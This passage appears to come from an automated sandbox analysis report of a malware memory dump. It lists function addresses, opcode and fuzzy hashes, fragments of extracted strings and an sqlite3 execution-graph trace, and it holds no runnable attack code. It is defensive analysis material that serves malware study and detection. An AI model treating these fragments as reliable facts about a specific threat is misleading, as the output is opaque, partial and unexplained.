                                  Function 00CE20B8 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6561bcfa02841114a350d91a90c64e50e5e15a921bda01133bc50363453ccafe
                                  • Instruction ID: 0d5c7fefad407c89927bdd65df75018ac7475428f31550964b8fdc25d119f1ca
                                  • Opcode Fuzzy Hash: 6561bcfa02841114a350d91a90c64e50e5e15a921bda01133bc50363453ccafe
                                  • Instruction Fuzzy Hash: E2E04F3260035837D620658A9C06F9BB75C8BC2F70F554068FE18AB281E5A4AD4182E5
                                  Function 00CE0188 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                  • Instruction ID: e5bcaf910414a8dd297e2478f0b0ee0d96d3988bccc1fbc64fec88159a311d78
                                  • Opcode Fuzzy Hash: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                  • Instruction Fuzzy Hash: 2AE08C323802187BC220FA5ADC42FDB77ACDFC5B10F114456FA08A7242DA70B9108BF0
                                  Function 00CE1FD8 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f88a89632d3a24d29444d332d845c39dab62cebe3f61d83eef54aa04b16102a0
                                  • Instruction ID: 14dfecc9f8f00a609caa0d38b1f060625cc9e7185d7497f99da0920a0d177923
                                  • Opcode Fuzzy Hash: f88a89632d3a24d29444d332d845c39dab62cebe3f61d83eef54aa04b16102a0
                                  • Instruction Fuzzy Hash: AAC012B26003086BDB00EA88CC46FAA339CAB08620F008494BA0C8B282E5B0B95086A5
                                  Function 00CC38D8 Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb7ddfd1936385b78618dfa913270c96b881e2fdbcd96ea7790672accd437027
                                  • Instruction ID: 14079e7e0ca040f77ff74e1a35300b96859b14ac9dc81b00a9f71bf768f65125
                                  • Opcode Fuzzy Hash: eb7ddfd1936385b78618dfa913270c96b881e2fdbcd96ea7790672accd437027
                                  • Instruction Fuzzy Hash: 1DA012835A00853216107051840587218068053AB1290053464C1940EAA64118403012

                                  Non-executed Functions

                                  Function 00CCC73A Relevance: 51.4, Strings: 41, Instructions: 170COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                  • API String ID: 0-3248090998
                                  • Opcode ID: 746269e28438d9a129e7424bdea0044086c5739fd2e90d4a98370bb9afe87e1b
                                  • Instruction ID: 657b452b52d0812250ee5380ec27f64256df7582c467124eef71604cfa046a4c
                                  • Opcode Fuzzy Hash: 746269e28438d9a129e7424bdea0044086c5739fd2e90d4a98370bb9afe87e1b
                                  • Instruction Fuzzy Hash: 9391F0F08052A98ACB118F55D4607DEBF71BB95304F1581E9C6AA7B243C3BE4E86DF90
                                  Function 00CBB06F Relevance: 35.1, Strings: 28, Instructions: 52COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &";$ ;%5$";&#$";&#$# 5F$#!<5$#;&.$& ";$&#5=$5BZB$5[A5$;%;'$=B|{$Rpv~$Teey$Xzo|$Y95y$^]AX$^|a:$p:!&$pBpw$qzbf$tstg$yyt:$z<5V$|: &$|~p5$}gzx
                                  • API String ID: 0-4206406930
                                  • Opcode ID: b168a974cd014e86ec91a4ae7f26ad1fd7009ca532abe67d9d1fe3542386e22f
                                  • Instruction ID: 0023867ba5971dc3b7e46110aaf983736b2b5269b28edae5981bdbff91b83b10
                                  • Opcode Fuzzy Hash: b168a974cd014e86ec91a4ae7f26ad1fd7009ca532abe67d9d1fe3542386e22f
                                  • Instruction Fuzzy Hash: 1221BEB8C002589BCF14CFD6E9816EDBF74BB15340F249649E8296F218D3765A42CF95
                                  Function 00CDA438 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                  • API String ID: 0-1002149817
                                  • Opcode ID: 2a786268bd2638d84069e00c302f8b19ba9fcff3cfe5bf4b339c960285849b61
                                  • Instruction ID: 746b21be5432475316bc37144b7f185647292ed7e330d57b4ee9ab527c1eae16
                                  • Opcode Fuzzy Hash: 2a786268bd2638d84069e00c302f8b19ba9fcff3cfe5bf4b339c960285849b61
                                  • Instruction Fuzzy Hash: 1FC10FB1D002689EDB60DFA5CC45BEEBBB9AF45304F004199E54CAB241D7B54A88DF91
                                  Function 00CC2EE8 Relevance: 28.9, Strings: 23, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !$($.$1E$8Y$9m$?/$Am$J$J<$K$RA$Tj$X$]/$`$`q$a:$lv$r.$z$|$Z
                                  • API String ID: 0-2650000396
                                  • Opcode ID: 9c37256f0be314324bd4274a84cb0d1950c59a208af0abcb4f4abe4c9aa3ec90
                                  • Instruction ID: a911a79d1210a77df796f582b2ee4360bee2eae40751c742096c73ce2b5e15f2
                                  • Opcode Fuzzy Hash: 9c37256f0be314324bd4274a84cb0d1950c59a208af0abcb4f4abe4c9aa3ec90
                                  • Instruction Fuzzy Hash: 8E9107B0D05669CBFB61CF41C9587DEBAB1BB05308F5081D9C55C3B281DBBA1A89CF91
                                  Function 00CD78B7 Relevance: 25.2, Strings: 20, Instructions: 248COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: 79a0fe214aab4116afdfd5c5b1b61d782146de8118546f21da666684b65edaa7
                                  • Instruction ID: f0cc1c28f0eb84065cedb2b86e063bf194d52fae79a04127f98bd4eafa2fc3b0
                                  • Opcode Fuzzy Hash: 79a0fe214aab4116afdfd5c5b1b61d782146de8118546f21da666684b65edaa7
                                  • Instruction Fuzzy Hash: 359154B1900318AAEB20EF95CC81FEEB7BCAF44704F104199F608A6141EB755B89DFA1
                                  Function 00CD32A8 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                  • API String ID: 0-392141074
                                  • Opcode ID: b173aa15dd592b705441fb702abf348f3a344cff5fd6a9d5ed324c8b58af1050
                                  • Instruction ID: 5877c00e373a9f05142a8fda425cfa5d0aa31a6aaf5e7cda87168af7eff0c245
                                  • Opcode Fuzzy Hash: b173aa15dd592b705441fb702abf348f3a344cff5fd6a9d5ed324c8b58af1050
                                  • Instruction Fuzzy Hash: 7C711DB1D00218AADB25EB95CC81FEEB77CBF18700F04459DF609AA181EB756748DFA1
                                  Function 00CD32A0 Relevance: 16.4, Strings: 13, Instructions: 172COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                  • API String ID: 0-392141074
                                  • Opcode ID: 5934b899a55d445d3f66c7b848ed8c4ba5f7e46a195d324a8838b9c97192a2be
                                  • Instruction ID: 0f33bd81e8ee485f48532574285956b980ab729bdf01103ef40983cd13226e5f
                                  • Opcode Fuzzy Hash: 5934b899a55d445d3f66c7b848ed8c4ba5f7e46a195d324a8838b9c97192a2be
                                  • Instruction Fuzzy Hash: ED612DB1D00218AADB25EBA5CC81FEEB77DBF18700F04419DF609AA191EB745748DFA1
                                  Function 00CCE5D8 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                  • API String ID: 0-2356907671
                                  • Opcode ID: 165ba30470c8441a7d813460208a745cab64faadde12e0e4807c3842ed9a2b44
                                  • Instruction ID: 4a21c9ac7724d33d61bbbdcae962973e251254a345ff2809d6b7d6864e7c89ef
                                  • Opcode Fuzzy Hash: 165ba30470c8441a7d813460208a745cab64faadde12e0e4807c3842ed9a2b44
                                  • Instruction Fuzzy Hash: BC81A6B2C403186AEB51EBA5CC82FEF77BCAF44700F044599F608A6141EB755798DFA2
                                  Function 00CC7600 Relevance: 13.8, Strings: 11, Instructions: 89COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                  • API String ID: 0-685823316
                                  • Opcode ID: 29532b322de0b58170e34fcfc149eed037805447248473621acccccfd944de1e
                                  • Instruction ID: e4ccb5701b4e974bf49a2d0b0381cb76828e834940d96d37d168b935ef40dc4b
                                  • Opcode Fuzzy Hash: 29532b322de0b58170e34fcfc149eed037805447248473621acccccfd944de1e
                                  • Instruction Fuzzy Hash: 8E3180B1D51218AAEF50DF94CC85FEEBBB9BB08704F00815DF608BA181DBB55648CBA4
                                  Function 00CD7D55 Relevance: 12.8, Strings: 10, Instructions: 341COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                  • API String ID: 0-2304485323
                                  • Opcode ID: 44a8754c376f9405f698a60cff59a901568f3950ee45d89d7b8abadea4613eaa
                                  • Instruction ID: 9abe1a26983a3f98d7f25300ff3f588bf59f8f327a7c63dee370bbc491e966de
                                  • Opcode Fuzzy Hash: 44a8754c376f9405f698a60cff59a901568f3950ee45d89d7b8abadea4613eaa
                                  • Instruction Fuzzy Hash: 55D1DCB2900709ABDB94DFA4CC81FEEB3FCEF48310F444519F219A6241EB79A945CB61
                                  Function 00CD7D58 Relevance: 12.7, Strings: 10, Instructions: 209COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                  • API String ID: 0-2304485323
                                  • Opcode ID: 6bd15d3b50e2150818f1604e8dea0118717eebc54161d7024121cd6113c9010c
                                  • Instruction ID: 7384271225cd845e109e1b328791d9671ddb73bbc877f5a103af037e6831ef32
                                  • Opcode Fuzzy Hash: 6bd15d3b50e2150818f1604e8dea0118717eebc54161d7024121cd6113c9010c
                                  • Instruction Fuzzy Hash: D681E9B1900708AFDB94DFA4C881BEEB7F8FF48310F14451DE219A7241EB79A945CBA5
                                  Function 00CDAC88 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: L$S$\$a$c$e$l
                                  • API String ID: 0-3322591375
                                  • Opcode ID: 4ce48506e94f5eb3b96fd1f978c650094e06858cf2a384e24a259c91a4c99e46
                                  • Instruction ID: 8d8330458247727a7bde39a35b74edc23ac55f8324bbb33a5cb35facaa666d0f
                                  • Opcode Fuzzy Hash: 4ce48506e94f5eb3b96fd1f978c650094e06858cf2a384e24a259c91a4c99e46
                                  • Instruction Fuzzy Hash: 6A41B972C10218AACB10DF95CC85BDEB7F9EF48310F05425AE91DA7200E7715A459BD1
                                  Function 00CBAF99 Relevance: 8.8, Strings: 7, Instructions: 48COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: )$@JH]$HYYE$H]@F$H_@O$YE@J$]LQ]
                                  • API String ID: 0-3186573047
                                  • Opcode ID: 23f52a954390cabea3b1d3e9972e441162d7b13389e853465dfeb448ac4112eb
                                  • Instruction ID: a27b8b6a71d55555cf8462ce9791efa00c72782b02e019d19eac5f6e17377e9f
                                  • Opcode Fuzzy Hash: 23f52a954390cabea3b1d3e9972e441162d7b13389e853465dfeb448ac4112eb
                                  • Instruction Fuzzy Hash: 8A1100B08002A8AACF05CFD0AA881DEFFB1BF06718F214158D8287F201E7354A868F91
                                  Function 00CBE368 Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$9$<$H$S$Z
                                  • API String ID: 0-2801059568
                                  • Opcode ID: 0bf5c4b8d0c53c640079bc860275fc5d34b790261851eea0833aaad79cd62768
                                  • Instruction ID: 515e398688eefa8d2dd0691ebb2e86db809ff12fed59419b7e49091c259fc0ac
                                  • Opcode Fuzzy Hash: 0bf5c4b8d0c53c640079bc860275fc5d34b790261851eea0833aaad79cd62768
                                  • Instruction Fuzzy Hash: 2E11A920D087CED9DB12C7BC84082EEBFB15B23224F0883D994A42B2D2D2794716D7A6
                                  Function 00CD27CB Relevance: 6.4, Strings: 5, Instructions: 196COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: 89784b473e4ca26ab546a21a58b0f5dae2eaa84bf08bb46e8c1a81a20c400d30
                                  • Instruction ID: 1c3badf4eabe2f2bfe6a9b7b4222ae1b0335adf8604c079bced0d496a531d1c9
                                  • Opcode Fuzzy Hash: 89784b473e4ca26ab546a21a58b0f5dae2eaa84bf08bb46e8c1a81a20c400d30
                                  • Instruction Fuzzy Hash: 0B613CB2900304AFDB24DBA4CC81FEFB7FDAB98710F10455AF659A7240E735AA41CB60
                                  Function 00CD27C8 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $i$l$o$u
                                  • API String ID: 0-2051669658
                                  • Opcode ID: 5f421520683217084d469de61868ca7097cff87a5d1a55af5c55c3fa091da9c1
                                  • Instruction ID: c0b9e6d3d4997000494b030b89d5e050211d7fa8f16c4d59312c9d0242e34372
                                  • Opcode Fuzzy Hash: 5f421520683217084d469de61868ca7097cff87a5d1a55af5c55c3fa091da9c1
                                  • Instruction Fuzzy Hash: 914119B1900308AFDB20DFA4CC84FEFBBF9AB49700F104559E659A7280D770AA418B60
                                  Function 00CBAF3F Relevance: 6.3, Strings: 5, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -!ed$d-!c$f{hq$gm`u$s
                                  • API String ID: 0-2873542444
                                  • Opcode ID: 2ab49b3b47390cdbb66d686b187c2e053f9c108f71413892b3bdda2676ee05b3
                                  • Instruction ID: eff1cbd3c6a7c7f14a323135f37b80f08b180f572be60a2515d56538bce66358
                                  • Opcode Fuzzy Hash: 2ab49b3b47390cdbb66d686b187c2e053f9c108f71413892b3bdda2676ee05b3
                                  • Instruction Fuzzy Hash: A5012BF480020D6ACB14DFE4C942AFEBB68FB09304F144658EE595B142E370CB558BD3
                                  Function 00CBE34F Relevance: 6.3, Strings: 5, Instructions: 38COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$<$H$S$Z
                                  • API String ID: 0-1904692081
                                  • Opcode ID: 30e4a09501ff10839fa75cdc51aa3ac137d160b149bbe4ac6288a5c69a8882d3
                                  • Instruction ID: 8775771d9a4f708a08ac96969676a66f5b45e36728909a79e15f384d285ba888
                                  • Opcode Fuzzy Hash: 30e4a09501ff10839fa75cdc51aa3ac137d160b149bbe4ac6288a5c69a8882d3
                                  • Instruction Fuzzy Hash: A211FE20D082DED9DB16C7A884143EEBFB15F12325F08C2D9D4A02B2D2C6794705DBA6
                                  Function 00CD2468 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: fe6b404c92718d4d8374b23ee7807c581da27f04d1ff5c8c8d58ef6ef2fa2234
                                  • Instruction ID: b7afc507383ef0c20e3dc2101b26351c8d68de16db91900e73841d786025de26
                                  • Opcode Fuzzy Hash: fe6b404c92718d4d8374b23ee7807c581da27f04d1ff5c8c8d58ef6ef2fa2234
                                  • Instruction Fuzzy Hash: 36B1D8B5A00708AFDB24DBA4CC85FEFB7B9AF88700F108559F659A7380D675AF418B50
                                  Function 00CD2D5C Relevance: 5.2, Strings: 4, Instructions: 233COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o
                                  • API String ID: 0-3662636641
                                  • Opcode ID: f55e7e4e794e6b80cdf28458c78f1183c30fe76d198e4c408649c0668f063812
                                  • Instruction ID: 345ab64350dcf738f7d7bb0f6c39782b82509a8867af6dc3f19df00579df3f4d
                                  • Opcode Fuzzy Hash: f55e7e4e794e6b80cdf28458c78f1183c30fe76d198e4c408649c0668f063812
                                  • Instruction Fuzzy Hash: 2C7162B29002187EDF64EB94CC85FEE737CAF49300F04459AF649A6141EE745B859BA2
                                  Function 00CD2D68 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o
                                  • API String ID: 0-3662636641
                                  • Opcode ID: c4367e4ed7d3451b0fbaf16fdc035e5b7a00fcb1a4aa89e001ef5845b4ae8873
                                  • Instruction ID: 83c10dcb7276859f543afe7dd62c3796a8fb53d647079e594007502d4ae7ea0d
                                  • Opcode Fuzzy Hash: c4367e4ed7d3451b0fbaf16fdc035e5b7a00fcb1a4aa89e001ef5845b4ae8873
                                  • Instruction Fuzzy Hash: 22313FB1E002187EDF50EBA5CC41FEEB2BCAF45700F4045AAB549A6151EE745B889FA2
                                  Function 00CCE908 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_aa0000_sQNFFcxirzZbXqUULewCRS.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1$3$d$p
                                  • API String ID: 0-682049505
                                  • Opcode ID: b6a39b7216521be85c346847cf533e35712de577936ef48e03c9889dd2a92db5
                                  • Instruction ID: f851d6f2b33e15084a9520ac10f0f7cc11704ea0ba50c59bec304605797bf05f
                                  • Opcode Fuzzy Hash: b6a39b7216521be85c346847cf533e35712de577936ef48e03c9889dd2a92db5
                                  • Instruction Fuzzy Hash: 553141B1910219ABEF04DB94CC46FEE77BCEF09304F044199F904A6281E7B59B448BE5

                                  Execution Graph

                                  Execution Coverage:1.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0.2%
                                  Total number of Nodes:489
                                  Total number of Limit Nodes:63
                                  execution_graph 26670 61e8997a sqlite3_initialize 26671 61e89998 26670->26671 26672 61e89a09 26670->26672 26678 61e1ff17 10 API calls 26671->26678 26674 61e899e6 26789 61e16278 sqlite3_free sqlite3_free 26674->26789 26675 61e899c3 26675->26674 26679 61e88c84 sqlite3_initialize 26675->26679 26678->26675 26680 61e8993f 26679->26680 26681 61e88cb7 26679->26681 26680->26674 26790 61e12104 26681->26790 26683 61e898e9 26685 61e898eb sqlite3_errcode 26683->26685 26684 61e88d39 sqlite3_mutex_enter 26793 61e29cc5 26684->26793 26688 61e898fa sqlite3_close 26685->26688 26689 61e89906 26685->26689 26686 61e88d0d 26686->26683 26686->26684 26692 61e88d2c sqlite3_free 26686->26692 26691 61e89911 sqlite3_free 26688->26691 26689->26691 26690 61e88e26 26693 61e29cc5 15 API calls 26690->26693 26691->26680 26692->26683 26694 61e88e4e 26693->26694 26695 61e29cc5 15 API calls 26694->26695 26696 61e88e76 26695->26696 26697 61e29cc5 15 API calls 26696->26697 26698 61e88e9e 26697->26698 26699 61e29cc5 15 API calls 26698->26699 26700 61e88ec6 26699->26700 26701 61e89928 sqlite3_mutex_leave 26700->26701 26802 61e11eea 26700->26802 26701->26685 26704 61e88f0a 26890 61e36656 13 API calls 26704->26890 26705 61e88efe 26889 61e26168 sqlite3_log 26705->26889 26708 61e88f08 26709 61e88f2f 26708->26709 26710 61e88f71 26708->26710 26891 61e29799 11 API calls 26709->26891 26808 61e43f0e 26710->26808 26714 61e88f9c 26714->26701 26715 61e88f61 sqlite3_free 26715->26701 26717 61e88fc2 26879 61e150b0 26717->26879 26719 61e88fcf 26720 61e150b0 3 API calls 26719->26720 26721 61e88ff8 26720->26721 26721->26701 26722 61e89030 sqlite3_overload_function 26721->26722 26723 61e8904d 26722->26723 26724 61e89054 sqlite3_errcode 26722->26724 26723->26724 26725 61e89068 26724->26725 26765 61e89377 26724->26765 26726 61e89670 26725->26726 26727 61e89070 sqlite3_malloc 26725->26727 26731 61e89682 sqlite3_create_function 26726->26731 26741 61e89758 26726->26741 26727->26726 26729 61e8908a 26727->26729 26728 61e8939a 26728->26726 26734 61e8944e sqlite3_create_module 26728->26734 26892 61e262e4 14 API calls 26729->26892 26730 61e89388 sqlite3_errcode 26730->26701 26730->26728 26735 61e896cc sqlite3_create_function 26731->26735 26731->26741 26733 61e8984a 26883 61e1341e 26733->26883 26734->26726 26737 61e89478 sqlite3_malloc 